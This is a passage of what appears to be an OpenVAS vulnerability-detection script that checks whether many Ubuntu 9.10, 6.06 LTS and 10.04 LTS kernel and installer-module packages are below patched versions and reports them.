isdpkgvuln(pkg:\"nfs-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-386\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-686\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-k7\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-386\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-686\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-k7\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.15\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.15\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"acpi-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cdrom-core-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cdrom-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crc-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ext2-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ext3-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ide-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ipv6-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"jfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"loop-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-firmware-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ntfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"reiserfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-core-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ufs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-storage-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"xfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.90\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-310-ec2\", ver:\"2.6.32-310.21\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-310-ec2\", ver:\"2.6.32-310.21\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-26-386\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-26-generic-pae\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-26-generic\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-26-386\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-26-generic-pae\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-26-generic\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-26-virtual\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-2.6.32-26\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.32-310.21\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.32\", ver:\"2.6.32-310.21\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-310\", ver:\"2.6.32-310.21\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-26\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.32\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-common\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != 